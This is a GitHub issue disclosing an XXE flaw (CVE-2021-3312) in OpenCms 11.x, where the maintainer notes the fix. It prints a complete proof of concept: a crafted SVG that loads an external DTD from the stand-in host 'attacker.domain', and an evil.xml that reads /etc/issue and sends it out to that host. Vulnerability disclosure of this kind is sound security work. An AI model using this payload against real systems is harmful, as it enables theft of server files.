XXE vulnerability allows exfiltration of data from the server file system by uploading a crafted SVG #725

gWestenberger · 2021-10-07T08:28:02Z

In OpenCms 11.x, it is possible for logged in users with edit permissions to exfiltrate data from the server's file system and send it to an external server by uploading specially crafted SVGs files.

Example in which the first line of /etc/issue is read and sent to the server "attacker.domain":

The SVG file to upload:

<!DOCTYPE svg [
<!ELEMENT svg ANY >
<!ENTITY % sp SYSTEM "http://attacker.domain/evil.xml">
%sp;
]>
<svg viewBox="0 0 200 200" version="1.2" xlmns="http://www.w3.org/2000/svg" style="fill:red">
        <text x="15" y="100" style="fill:black">&exfil;</text>
</svg>

The evil.xml file served by the external server "attacker.domain":

<!ENTITY % file SYSTEM "file:///etc/issue">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.domain/?%file;'>">
%eval;
%exfil;

CVE ID: CVE-2021-3312.

The text was updated successfully, but these errors were encountered:

gWestenberger · 2021-10-07T08:29:55Z

Fixed in master branch for coming release.

gWestenberger added a commit that referenced this issue Oct 7, 2021

Fixed XXE issue in SVG processing (github issue #725).

92e0354

gWestenberger closed this as completed Oct 7, 2021

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

XXE vulnerability allows exfiltration of data from the server file system by uploading a crafted SVG #725

XXE vulnerability allows exfiltration of data from the server file system by uploading a crafted SVG #725

gWestenberger commented Oct 7, 2021

gWestenberger commented Oct 7, 2021

XXE vulnerability allows exfiltration of data from the server file system by uploading a crafted SVG #725

XXE vulnerability allows exfiltration of data from the server file system by uploading a crafted SVG #725

Comments

gWestenberger commented Oct 7, 2021

gWestenberger commented Oct 7, 2021